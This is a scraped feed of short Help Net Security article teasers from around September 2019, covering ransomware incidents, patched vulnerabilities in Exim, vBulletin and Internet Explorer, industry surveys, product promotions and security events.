The post 49% of infosec pros are awake at night worrying about their organization’s cybersecurity appeared first on Help Net Security.

Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More

The post Sophos Managed Threat Response: An evolved approach to proactive security protection appeared first on Help Net Security.

Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More

The post Danish company Demant expects to suffer huge losses due to cyber attack appeared first on Help Net Security.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which has been released on Sunday. About Exim and the flaw (CVE-2019-16928) According to E-Soft, Exim is the most widely used … More

The post Guess what? You should patch Exim again! appeared first on Help Net Security.

Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More

The post Assessing risk: Measuring the health of your infosec environment appeared first on Help Net Security.

Managing and monitoring privileged access to cloud ecosystems

Cloud data breaches are on the rise, demonstrating time and again the need for a different approach and strategy when it comes to managing and monitoring privileged access to cloud ecosystems. Privilege access management (PAM) should: Be risk-aware and intelligent Reduce sprawl of infrastructure, accounts, access and credentials Use continuous identity analytics. Just-in-time management of privileged accounts According to Gartner’s 2018 Magic Quadrant for PAM report, by 2022 more than 50% of organizations with PAM … More

The post Managing and monitoring privileged access to cloud ecosystems appeared first on Help Net Security.

Tolly report: Evaluating the evolution of network traffic analysis technology

Network Traffic Analysis has been rapidly evolving to counter the increased sophistication of threats experienced by organizations worldwide. Test methodologies and tools are not yet available which provide security professionals with the ability to test how well the products currently on the market perform. Awake Security has partnered with the Tolly Group and a current Darktrace customer to develop and execute just such a test and has published a report detailing the methodology and the … More

The post Tolly report: Evaluating the evolution of network traffic analysis technology appeared first on Help Net Security.

Ransomware attacks against small towns require collective defense

There is a war hitting small-town America. Hackers are not only on our shores, but they’re in our water districts, in our regional hospitals, and in our 911 emergency systems. The target du jour of ransomware hackers is small towns and they have gone after them with a vengeance. Last month, the governor of Texas, Greg Abbott, declared a “Level 2 Escalated Response” as 22 of Texas’s cities were hit simultaneously with ransomware attacks, crippling … More

The post Ransomware attacks against small towns require collective defense appeared first on Help Net Security.

Microsoft to block 40+ additional file extensions in Outlook on the web

Microsoft is planning to block by default 40+ new file types in Outlook on the web to improve the security for their customers. “We took the time to audit the existing blocked file list and update it to better reflect the file types we see as risks today,” the Exchange Team noted. Outlook on the web and blocked attachments Outlook on the web, formerly Outlook Web Access (OWA), is a personal information manager web app … More

The post Microsoft to block 40+ additional file extensions in Outlook on the web appeared first on Help Net Security.

How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More

The post How long before quantum computers break encryption? appeared first on Help Net Security.

A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More

The post A proactive approach to cybersecurity requires the right tools, not more tools appeared first on Help Net Security.

ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands overtime? Bottom line, it’s a balance … More

The post ThreatConnect Platform: Security insight for sound decision-making appeared first on Help Net Security.

eBook: The DevOps Roadmap for Security

DevOps is concerned with uniting two particular tribes: development and operations. These tribes have seemingly competing priorities: developers value features while operations value stability. These contradictions are largely mitigated by DevOps. A strong argument could be made that the values of the security tribe – defensibility – could just as easily be brought into the fold, forming a triumvirate under the DevSecOps umbrella. The security tribe’s way forward is to find ways to unify with … More

The post eBook: The DevOps Roadmap for Security appeared first on Help Net Security.

How to start achieving visibility in the cloud

As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More

The post How to start achieving visibility in the cloud appeared first on Help Net Security.

Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More

The post Should the National Security Council restore the cybersecurity coordinator role? appeared first on Help Net Security.

Podcast: Potential problems with the software supply chain for industrial sites

Industrial security pioneer Eric Byres, CEO of aDolus, speaks to software supply chain trust issues and some of the technology his new venture aDolus Inc. is developing to help. In this podcast Andrew Ginter talks to Eric Byres, about potential problems with the software supply chain for industrial sites. They ask how users can trust the firmware and software that they load into their industrial control systems.

The post Podcast: Potential problems with the software supply chain for industrial sites appeared first on Help Net Security.

Cybercriminals plan to make L7 routers serve card stealing code

One of the Magecart cybercriminal groups is testing a new method for grabbing users’ credit card info: malicious skimming code that can be loaded into files used by L7 routers. What is Magecart? Magecart is an umbrella label for a growing number of cybercriminals groups that perform JavaScript-based credit card skimming attacks, usually by: Compromising individual e-commerce sites Compromising third-party sources of scripts that online shop owners use to add various functionalities or serve ads … More

The post Cybercriminals plan to make L7 routers serve card stealing code appeared first on Help Net Security.

How can we thwart email-based social engineering attacks?

More than 99 percent of cyberattacks rely on human interaction to work, Proofpoint recently shared. More often than not, the principal attack method is phishing emails. When hitting enterprises, attackers love to impersonate Microsoft the most, as Office 365 is increasingly the heart of companies, providing the essential services (email, chat, document management, project management, etc.) that businesses depend on to run. They also constantly refine their tools and techniques. “While one-to-one attacks and one-to-many … More

The post How can we thwart email-based social engineering attacks? appeared first on Help Net Security.

Tackling biometric breaches, the decentralized dilemma

A recent discovery by vpnMentor revealed a worst case scenario for biometrics: a large cache of biometric data being exposed to the rest of the world. In this case web-based biometric security smart lock platform, BioStar 2, was breached. This breach surfaces a common flaw that many of the established providers of biometric authentication have built into their system. Many biometric providers store biometrics in a large centralized database. To avoid a biometric dystopia, adoption … More

The post Tackling biometric breaches, the decentralized dilemma appeared first on Help Net Security.

Cybersecurity breach experience strengthens CVs

It is in businesses’ best interest to hire cybersecurity leaders who have suffered an avoidable breach, because of the way it changes how security professionals think, feel and behave, according to Symantec. The findings reveal that suffering a breach – and coming out the other side – significantly reduces security leaders’ future workplace stress levels, while improving their likelihood to share knowledge. “It might sound counter intuitive at first,” comments Darren Thomson, CTO, Symantec EMEA, … More

The post Cybersecurity breach experience strengthens CVs appeared first on Help Net Security.

Employees are mistakenly confident that they can spot phishing emails

While a majority (79%) of people say they are able to distinguish a phishing message from a genuine one, nearly half (49%) also admit to having clicked on a link from an unknown sender while at work, according to a Webroot survey. Further, nearly half (48%) of respondents said their personal or financial data had been compromised by a phishing message. However, of that group more than a third (35%) didn’t take the basic step … More

The post Employees are mistakenly confident that they can spot phishing emails appeared first on Help Net Security.

Adopting DevOps practices leads to improved security posture

A strong DevOps culture based on collaboration and sharing across teams, leads to an improved security posture, according to Puppet. Twenty-two percent of the firms at the highest level of security integration having reached an advanced stage of DevOps maturity compared to only six percent of the firms with no security integration. Additionally, the report found that Europe is pulling ahead of the US and the Asia Pacific regions when it comes to firms with … More

The post Adopting DevOps practices leads to improved security posture appeared first on Help Net Security.

vBulletin zero-day exploited in the wild in wake of exploit release

An anonymous bug hunter has released a working and elegantly simple exploit for a pre-authentication remote code execution flaw (CVE-2019-16759) affecting vBulletin and it didn’t take long for attackers to start using it. About vBulletin vBulletin is the most popular internet forum software in use today. W3Techs says that around 0.1% of all internet sites run a vBulletin forum, though only 6.4% of these use vulnerable 5.x versions. MH Sub I, the company that develops … More

The post vBulletin zero-day exploited in the wild in wake of exploit release appeared first on Help Net Security.

Cybersecurity automation? Yes, wherever possible

There was a time when companies were hesitant about their IT and security teams using automation to discharge some of their duties. “I think much of that was due to the feeling that if a task was automated and something went wrong, IT was not in control and did not have as much visibility,” Candace Worley, Chief Technical Strategist at McAfee, told Help Net Security. But the increasing quantity and sophistication of threats, the massive … More

The post Cybersecurity automation? Yes, wherever possible appeared first on Help Net Security.

How can small companies with limited budgets win at security?

Securing data and systems is a must for every modern organization, but smaller ones often have to deal with budget and workforce limitations that make that goal harder to achieve. We’ve asked Chris Wysopal, CTO at Veracode and well-renowned security expert who is scheduled to hold a keynote at HITB+ CyberWeek on the topic of distributing security more evenly across all technology, to offer some advice for under-resourced organizations. Zero Trust Wysopal advises opting for … More

The post How can small companies with limited budgets win at security? appeared first on Help Net Security.

Rise of RDP as a target vector

Recent reports of targeted attacks using RDP as an initial entry vector have certainly caused significant headlines in lieu of the impact they have caused. In the midst of city wide impacts, or even million dollar (plus) demands it is easy to overlook the initial entry vector. What began as ‘targeted’ emails focusing on predominantly consumers, the evolution of ransomware has widened to incorporate pseudo attacks intended purely for destruction (e.g. no viable decryption capability, … More

The post Rise of RDP as a target vector appeared first on Help Net Security.

99% of misconfiguration incidents in the cloud go unnoticed

IaaS is now the fastest growing area of the cloud due to the speed, cost and reliability with which organizations can create and deploy applications, according to McAfee. Cloud-Native Breach (CNB) attack chain The results of the survey demonstrate that 99 percent of IaaS misconfigurations go unnoticed—indicating awareness around the most common entry point to new “Cloud-Native Breaches” (CNB) is extremely low. “In the rush toward IaaS adoption, many organizations overlook the shared responsibility model … More

The post 99% of misconfiguration incidents in the cloud go unnoticed appeared first on Help Net Security.

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

The post Older vulnerabilities and those with lower severity scores still being exploited by ransomware appeared first on Help Net Security.

Security capabilities are lagging behind cloud adoption

Security professionals regard their existing tools inadequate for securing critical cloud data, even as their organizations invest heavily, with increasing speed, in cloud applications, according to ESG. The report, based on surveys with responses ranging from approximately 392-600 senior IT decision makers and cyber security professionals, reveals that cloud-first strategies are becoming more common, with 39 percent of respondents from cloud-first organizations saying that they only consider on-premises if someone makes a compelling business case … More

The post Security capabilities are lagging behind cloud adoption appeared first on Help Net Security.

Whitepaper: The self-fulfilling prophecy of the cybersecurity skills shortage

The tale of two sides: how would cybersecurity pros and organizations solve the cybersecurity skills gap shortage? eSentire asked cybersecurity experts to weigh in on the widening cybersecurity skills shortage by surveying hundreds of cybersecurity professionals and organizations. The results reflect how a self-fulfilling prophecy has compounded the problem, and what can be done to address the challenges in the future. Read The Self-Fulfilling Prophecy of the Cybersecurity Skills Shortage to get perspectives on the … More

The post Whitepaper: The self-fulfilling prophecy of the cybersecurity skills shortage appeared first on Help Net Security.

Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable systems. The Internet Explorer vulnerability (CVE-2019-1367) CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights … More

The post Microsoft drops emergency Internet Explorer fix for actively exploited zero-day appeared first on Help Net Security.

Could audio warnings augment your ability to fight off cyber attacks?

The security of your environment shouldn’t depend on whether you’re looking in the right place at the right time. While active visual means such as dashboards, emails, tickets, and chat messages are a vital part of security event monitoring, they might not get your attention if your eyes are elsewhere. Even when you’re focused on the right screen, important events can easily get buried in an overload of information, delaying their processing – or allowing … More

The post Could audio warnings augment your ability to fight off cyber attacks? appeared first on Help Net Security.

CISO role grows in stature, but challenges remain

In order to find out how CISOs perceive the state of their profession, Optiv Security interviewed 200 CISOs or senior security personnel with equivalent responsibilities in both the US and the UK. Perceiving cybersecurity Survey respondents indicated a fundamental change in how senior executives and board members perceive cybersecurity. Perhaps most surprising was the fact that 58% said experiencing a data breach makes them more attractive to potential employers. This stands in stark contrast to … More

The post CISO role grows in stature, but challenges remain appeared first on Help Net Security.

Passwordless authentication is here ​now​, and it is vastly superior to using a password

Mirko Zorz, Help Net Security’s Editor in Chief, recently published ​an article about the state of passwordless authentication​ that predicted a long journey before this technology is viable. We would like to share that passwordless multi-factor authentication is a reality today. Large and respected organizations, including a significant healthcare software provider, are already using this technology with great success. Here is how TraitWare has completed the journey to deliver passwordless authentication. Passwordless authentication doesn’t have … More

The post Passwordless authentication is here ​now​, and it is vastly superior to using a password appeared first on Help Net Security.

What security and privacy enhancements has iOS 13 brought?

With the release of iPhone 11 and its two Pro variants, Apple has released iOS 13, a substantial functional update of its popular mobile operating system. But while many users are happy to finally get a complete Dark Mode for the device or a better phone camera, some are more interested in security and privacy enhancements. Location data On iOS 13, users will be able to control the location data shared with apps with more … More

The post What security and privacy enhancements has iOS 13 brought? appeared first on Help Net Security.

How data breaches forced Amazon to update S3 bucket security

Amazon launched its Simple Storage Service (better known as S3) back in 2006 as a platform for storing just about any type of data under the sun. Since then, S3 buckets have become one of the most commonly used cloud storage tools for everything from server logs to customer data, with prominent users including Netflix, Reddit, and GE Healthcare. While S3 rolled out of the gate with good security principals in mind, it hasn’t all … More

The post How data breaches forced Amazon to update S3 bucket security appeared first on Help Net Security.

Disclosing vulnerabilities to improve software security is good for everyone

Today, software companies and security researchers are near universal in their belief that disclosing vulnerabilities to improve software security is good for everyone, according to a Veracode report. 451 Research conducted survey from December 2018 to January 2019 using a representative sample of 1,000 respondents across a range of industries and organization sizes in the US, Germany, France, Italy and the UK. Survey respondents reported enterprise roles such as application development, infrastructure and information security, … More

The post Disclosing vulnerabilities to improve software security is good for everyone appeared first on Help Net Security.

How SMBs can bring their security testing on par with larger enterprises

What are the challenges of securing small and medium-sized enterprises vs. larger ones? And how can automated, continuous security testing help shrink the gap? When studying the differences between cyber security for small and medium sized enterprises (SMEs) and larger enterprises, several components factor into how securing SMEs is different. Here’s a breakdown. Business hour coverage To monitor systems for suspicious activity, larger enterprises have security operations teams working in shifts 24×7. At best, SMEs … More

The post How SMBs can bring their security testing on par with larger enterprises appeared first on Help Net Security.

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

The post Product showcase: NetLib Security Encryptionizer appeared first on Help Net Security.

Should you trust your smart TV or streaming device?

“Smart” devices might be handy and offer higher quality services, but users should be aware that everything comes with a price. And we’re not talking here about the price of the actual device, but of the fact that these devices collect device, user and user behavior information and send it to a variety of third-parties. This information might currently be worthless to users, but it’s worth a lot to companies: it is used to improve … More

The post Should you trust your smart TV or streaming device? appeared first on Help Net Security.

Organizations continue to struggle with privacy regulations

Many organizations’ privacy statements fail to meet common privacy principles outlined in GDPR, CCPA, PIPEDA, including the user’s right to request information, to understand how their data is being shared with third parties and the ability of that information to be deleted upon request, according to the Internet Society’s Online Trust Alliance (OTA). Organizations also have a duty to notify users of their rights in an easily understandable matter. OTA analyzed 29 variables in 1,200 … More

The post Organizations continue to struggle with privacy regulations appeared first on Help Net Security.

How organizations view and manage cyber risk

Amid a wider range of issues to handle, a majority of board members and senior executives responsible for their organization’s cyber risk management had less than a day in the last year to spend focused on cyber risk issues, the 2019 Marsh Microsoft Global Cyber Risk Perception Survey results have revealed. This lack of time for senior leaders to focus on cyber risk comes as concern over cyber threats hits an all-time high, and as … More

The post How organizations view and manage cyber risk appeared first on Help Net Security.

A bug made some Windows Defender antivirus scans fail

Microsoft has released a fix for a bug that made its Windows Defender Antivirus fail after a few seconds when users opted for a Quick or Full scan of the system. Users are advised to implement security intelligence update (virus definitions) v1.301.1684.0 or later to get the software back on track. Bundled antivirus protection Windows Defender Antivirus is an anti-malware component of Microsoft Windows 10 – in essence, free antivirus software. The software used to … More

The post A bug made some Windows Defender antivirus scans fail appeared first on Help Net Security.

(IN)SECURE Magazine issue 63 released

(IN)SECURE Magazine is a free digital security publication discussing some of the hottest information security topics. Issue 63 has been released today. It’s a free download, no registration required. Table of contents Identifying evasive threats hiding inside the network Inside the NIST team working to make cybersecurity more user-friendly Report: Black Hat USA 2019 Healthcare’s blind spot: Unmanaged IoT and medical devices What the education industry must do to protect itself from cyber attacks Solving … More

The post (IN)SECURE Magazine issue 63 released appeared first on Help Net Security.

SLAs: What your cybersecurity vendor isn’t telling you

Service Level Agreements (SLAs) have been used in the IT world for many years as a contractual mechanism for holding service providers accountable and extracting defined payments and penalties when they mess up. Likewise, vendors have used SLAs to put their “money where their mouth is” in terms of fulfilling value promises and establishing important metrics for their customers. In reality, SLAs have not kept up with either of these purposes. For most IT pros, … More

The post SLAs: What your cybersecurity vendor isn’t telling you appeared first on Help Net Security.

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

The post The use of open source software in DevOps has become strategic for organizations of all sizes appeared first on Help Net Security.

World’s top 25 CTF teams to battle for $100,000 at HITB PRO CTF

In less than a month, Hack In The Box is launching its biggest global event: HITB+CyberWeek 2019. It is a week-long gathering (October 12-17, 2019, at Emirates Palace, Abu Dhabi) that will bring together the world’s top cyber security experts to share and discuss their latest knowledge, ideas and techniques with security professionals and students. Aside from offering the usual trainings and talks, HITB has been developing specific content and challenges for the wider student … More

The post World’s top 25 CTF teams to battle for $100,000 at HITB PRO CTF appeared first on Help Net Security.

Security is slowly becoming essential to doing business

A veteran of the information security industry, Greg Jensen has spent the last six years at Oracle as the Senior Director of Oracle’s Cloud Security solutions. He’s also the Senior Editor of the Oracle and KPMG Cloud Threat Report, as well as Oracle’s annual CISO Report. “The focus of these efforts is to understand the key challenges that hundreds of global organizations are struggling with as they lift and shift workloads to the cloud, and … More

The post Security is slowly becoming essential to doing business appeared first on Help Net Security.

Confidential data of 24.3 million patients discovered online

Greenbone Networks has released details of new research in to the security of the servers used by health providers across the world to store images of X-rays as well as CT, MRI and other medical scans. Of the 2,300 medical image archive systems worldwide that Greenbone analyzed between mid-July and early September 2019, 590 of them were freely accessible on the internet, together containing 24.3 million data records from patients located in 52 different countries. … More

The post Confidential data of 24.3 million patients discovered online appeared first on Help Net Security.

Download: RFP templates for EDR/EPP and APT protection

Security decision makers need to address APT risks, but struggle with mapping APT attack vectors to a clear-cut set of security product capabilities, which impairs their ability to choose the products that would best protect them. Cynet is addressing this need with the definitive RFP templates for EDR/EPP and APT protection, an expert-made security requirement list, that enables stakeholders to accelerate and optimize the evaluation process of the products they evaluate. The RFP contains five … More

The post Download: RFP templates for EDR/EPP and APT protection appeared first on Help Net Security.

Five ways to manage authorization in the cloud

The public cloud is being rapidly incorporated by organizations, allowing them to store larger amounts of data and applications with higher uptime and reduced costs, while at the same time, introducing new security challenges. One of the more prominent challenges is identity management and authorization. Since the beginning of cloud computing, authorization techniques in the cloud have evolved into newer models, which acknowledge the many different services that now come together to form a company’s … More

The post Five ways to manage authorization in the cloud appeared first on Help Net Security.

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

The post Targeted threat intelligence and what your organization might be missing appeared first on Help Net Security.

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

The post Researchers uncover 125 vulnerabilities across 13 routers and NAS devices appeared first on Help Net Security.

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by the Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

The post BotSlayer tool can detect coordinated disinformation campaigns in real time appeared first on Help Net Security.

Mini eBook: CCSP Practice Tests

The Certified Cloud Security Professional (CCSP) shows you have the advanced technical skills and knowledge to design, manage and secure data, applications and infrastructure in the cloud using best practices, policies and procedures. Download the Mini eBook for a sneak peek into the Official (ISC)² CCSP Practice Tests book. Inside you’ll find: 50 CCSP practice test items and answers to gauge your knowledge. Discount code to save on the full version which includes 1,000 items.

The post Mini eBook: CCSP Practice Tests appeared first on Help Net Security.

CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

The post CISO do’s and don’ts: Lessons learned appeared first on Help Net Security.

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

The post Threat visibility is imperative, but it’s even more essential to act appeared first on Help Net Security.

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

The post Four in five businesses need ways to better secure data without slowing innovation appeared first on Help Net Security.

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

The post Exploitation of IoT devices and Windows SMB attacks continue to escalate appeared first on Help Net Security.

Sandboxie becomes freeware, soon-to-be open source

Sophos plans to open source Sandboxie, a relatively popular Windows utility that allows users to run applications in a sandbox. Until that happens, they’ve made the utility free. About Sandboxie Sandboxie creates a virtual container in which untrusted programs can be run or installed so that they can’t maliciously modify the underlying OS or data on the host machine. If can make the use of apps such as browsers, email programs, IM clients, Office suites, … More

The post Sandboxie becomes freeware, soon-to-be open source appeared first on Help Net Security.

New infosec products of the week: September 13, 2019

Awake Security enhances its platform with the ability to identify attackers based on their intent Awake Security introduced Adversarial Modeling, an industry-first capability that gives security teams an unparalleled ability to identify attackers based on their intent. By understanding mal-intent, versus looking for only specific indicators of an attack, Awake greatly improves the ability for organizations to see and stop attackers, especially those that are living-off-the-land. RocketBroadband’s SD-WAN solution allows businesses to keep critical apps … More

The post New infosec products of the week: September 13, 2019 appeared first on Help Net Security.

The rise of modern applications, DevSecOps and the intelligence economy

There has been a significant year-over-year growth in enterprise usage trends around multi-cloud adoption, open source technologies such as Kubernetes, and AWS cloud-native services adoption, Sumo Logic report reveals. The research also shows the increasing need for cloud-based security solutions such as cloud SIEM to help enterprises address today’s increasingly complex security landscape. The intelligence economy The report also provides a summary of three major trends shaping digital business today: the rise of modern applications, … More

The post The rise of modern applications, DevSecOps and the intelligence economy appeared first on Help Net Security.